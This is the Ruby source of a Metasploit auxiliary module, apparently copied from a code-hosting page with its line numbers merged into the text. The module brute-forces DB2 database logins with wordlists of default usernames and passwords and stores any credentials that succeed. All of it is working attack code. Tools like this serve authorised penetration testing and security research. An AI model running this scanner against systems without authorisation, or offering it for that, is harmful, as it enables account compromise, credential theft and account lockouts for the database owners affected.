Path: blob/master/modules/auxiliary/scanner/db2/db2_auth.rb
19514 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45require 'metasploit/framework/credential_collection'6require 'metasploit/framework/login_scanner/db2'78class MetasploitModule < Msf::Auxiliary9include Msf::Exploit::Remote::DB210include Msf::Auxiliary::AuthBrute11include Msf::Auxiliary::Scanner12include Msf::Auxiliary::Report1314def initialize15super(16'Name' => 'DB2 Authentication Brute Force Utility',17'Description' => %q{18This module attempts to authenticate against a DB2 instance19using username and password combinations indicated by the20USER_FILE, PASS_FILE, and USERPASS_FILE options.21},22'Author' => ['todb'],23'References' => [24[ 'CVE', '1999-0502'] # Weak password25],26'License' => MSF_LICENSE,27'Notes' => {28'Stability' => [CRASH_SAFE],29'SideEffects' => [IOC_IN_LOGS, ACCOUNT_LOCKOUTS],30'Reliability' => []31}32)3334register_options(35[36Opt::Proxies,37OptPath.new('USERPASS_FILE', [38false, 'File containing (space-separated) users and passwords, one pair per line',39File.join(Msf::Config.data_directory, 'wordlists', 'db2_default_userpass.txt')40]),41OptPath.new('USER_FILE', [42false, 'File containing users, one per line',43File.join(Msf::Config.data_directory, 'wordlists', 'db2_default_user.txt')44]),45OptPath.new('PASS_FILE', [46false, 'File containing passwords, one per line',47File.join(Msf::Config.data_directory, 'wordlists', 'db2_default_pass.txt')48]),49]50)51end5253def run_host(ip)54cred_collection = build_credential_collection(55realm: datastore['DATABASE'],56username: datastore['USERNAME'],57password: datastore['PASSWORD']58)5960scanner = Metasploit::Framework::LoginScanner::DB2.new(61configure_login_scanner(62host: ip,63port: rport,64proxies: datastore['PROXIES'],65cred_details: cred_collection,66stop_on_success: datastore['STOP_ON_SUCCESS'],67bruteforce_speed: datastore['BRUTEFORCE_SPEED'],68connection_timeout: 30,69max_send_size: datastore['TCP::max_send_size'],70send_delay: datastore['TCP::send_delay'],71framework: framework,72framework_module: self,73ssl: datastore['SSL'],74ssl_version: datastore['SSLVersion'],75ssl_verify_mode: datastore['SSLVerifyMode'],76ssl_cipher: datastore['SSLCipher'],77local_port: datastore['CPORT'],78local_host: datastore['CHOST']79)80)8182scanner.scan! do |result|83credential_data = result.to_h84credential_data.merge!(85module_fullname: fullname,86workspace_id: myworkspace_id87)88if result.success?89credential_core = create_credential(credential_data)90credential_data[:core] = credential_core91create_credential_login(credential_data)9293print_good "#{ip}:#{rport} - Login Successful: #{result.credential}"94else95invalidate_login(credential_data)96vprint_error "#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})"97end98end99end100end101102103